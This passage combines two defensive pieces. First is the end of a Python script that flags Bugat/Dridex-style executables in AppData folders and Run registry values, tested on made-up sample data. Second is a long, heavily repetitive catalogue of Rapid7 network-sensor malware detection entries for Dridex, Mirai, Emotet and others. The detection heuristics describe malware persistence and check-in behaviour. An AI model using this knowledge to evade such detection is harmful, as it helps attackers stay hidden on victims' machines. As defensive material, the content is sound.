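    """True when path is directly under a user's Application Data directory
    and the file name follows the Bugat naming convention."""
    return bool(APPDATA_DIR_RE.match(path)) and bool(BUGAT_NAME_RE.match(basename(path)))


def extract_executable(command: str) -> str:
    """Pull the executable path out of a Run-value command line.

    Heuristic, not a full cmd.exe parser: a quoted path followed by
    arguments, or an unquoted path up to the first '.exe' followed by
    whitespace. Anything else is returned unchanged.
    """
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    m = re.match(r"(.+?\.exe)(?:\s|$)", command, re.IGNORECASE)
    return m.group(1) if m else command


def suspicious_files(paths: list[str]) -> list[str]:
    """File paths (e.g. from a profile directory listing) matching the convention."""
    return [p for p in paths if is_bugat_style_path(p)]


def suspicious_run_values(run_values: dict[str, str]) -> list[tuple[str, str]]:
    """(value name, executable) for Run values that launch a Bugat-style file."""
    hits = []
    for name, command in run_values.items():
        exe = extract_executable(command)
        if is_bugat_style_path(exe):
            hits.append((name, exe))
    return hits


# Constructed sample data for the example (not taken from a real host).
SAMPLE_FILES = [
    r"C:\Users\alice\Application Data\kb208351.exe",
    r"C:\Users\alice\AppData\Roaming\3a83cd09.exe",
    r"C:\Users\alice\AppData\Roaming\Microsoft\Teams\Update.exe",  # nested: legitimate
    r"C:\Users\alice\AppData\Roaming\kb12.dll",                    # not an .exe
    r"C:\Program Files\Vendor\deadbeef.exe",                       # wrong location
]

SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "kb208351": r'"C:\Users\alice\Application Data\kb208351.exe"',
    "updater": r"C:\Users\alice\AppData\Roaming\3a83cd09.exe -silent",
}

if __name__ == "__main__":
    for p in suspicious_files(SAMPLE_FILES):
        print("file  :", p)
    for name, exe in suspicious_run_values(SAMPLE_RUN_VALUES):
        print("runkey:", name, "->", exe)
```

Only the first two sample files and the kb208351 and updater Run values are reported; the nested Teams updater, the .dll and the Program Files binary fall outside the convention even though two of them live under AppData. A match is a lead to validate (hash, signer, creation time), not proof on its own, since the naming convention is short enough that a legitimate file could collide with it.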

ET MALWARE Dridex CnC Request - Spam/Worm Component

Description

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex DL Pattern Feb 18 2016

Description

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex POST Checkin

Description

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex Post Check-in Activity

Description

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex POST Retrieving Second Stage

Description

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex v2 POST Checkin

Description

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Driveby Exploit Attempt Often to Install Monkif

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Driveby Loader Request List.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Drop.Agent.bfsv HTTP Activity (UsER-AgENt)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DTLoader Binary Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DTLoader Binary Request M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DTLoader Domain (ahgwqrq .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DTLoader Encoded Binary - Server Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dumador Reporting User Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DustySky CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Dyre CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dyreza RAT Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dyreza RAT Checkin 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dyreza RAT Ex-filtrating Data

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dyreza RAT Fake Server Header

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE eCh0raix/QNAPCrypt CnC Activity - Done

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE eCh0raix/QNAPCrypt CnC Activity - Started

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Echelon/DarkStealer Variant CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Echelon/DarkStealer Variant CnC Exfil M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Echelon/Mist Stealer CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ElectroRAT CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/AbcBot CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/AbcBot Requesting Commands from CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF_BASHLITE.SMB Dropping Files

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Chacha.DDoS/Xor.DDoS Stage 2 CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/DarkNexus User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Kinsing Payload Request M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Kinsing Payload Request M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/LiLocked Ransom Note in HTTP Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/MachO.Netwire Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mayhem Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Miner Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Miner Loader Activity M1 (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Miner Loader Activity M2 (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai User-Agent Observed (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Cakle)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Damien)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Hentai)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (lessie)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (muhstik)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Rift)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Shaolin)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Solar)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Tsunami)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Yakuza)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Inbound (Yowai)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Cakle)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Damien)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Hentai)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (lessie)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (muhstik)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Ouija_x.86)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (ph0ne)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Rift)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Shaolin)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Solar)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Tsunami)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Yakuza)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant UA Outbound (Yowai)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/muBoT User-Agent (I’m a mu mu mu ?)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Muhstik Attempting to Download Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Muhstik Bot Reporting Vulnerable Server to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Muhstik Scanner Module Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/RedXOR CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/RedXOR CnC Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Roboto - Possible Encrypted Roboto P2P Payload Requested M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Roboto - Possible Encrypted Roboto P2P Payload Requested M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/TooEasy Miner CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/Win32 Lucky Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE ELF/Win32 Lucky Ransomware Encryption Process Started

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE EMAIL SSL Cert APT1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Emotet Certificate Observed M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Emotet Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Emotet CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Emotet CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Emotet Post Drop C2 Comms M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Emotet v2 Exfiltrating Outlook information

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Emotet Wifi Bruter Module Checkin

Description

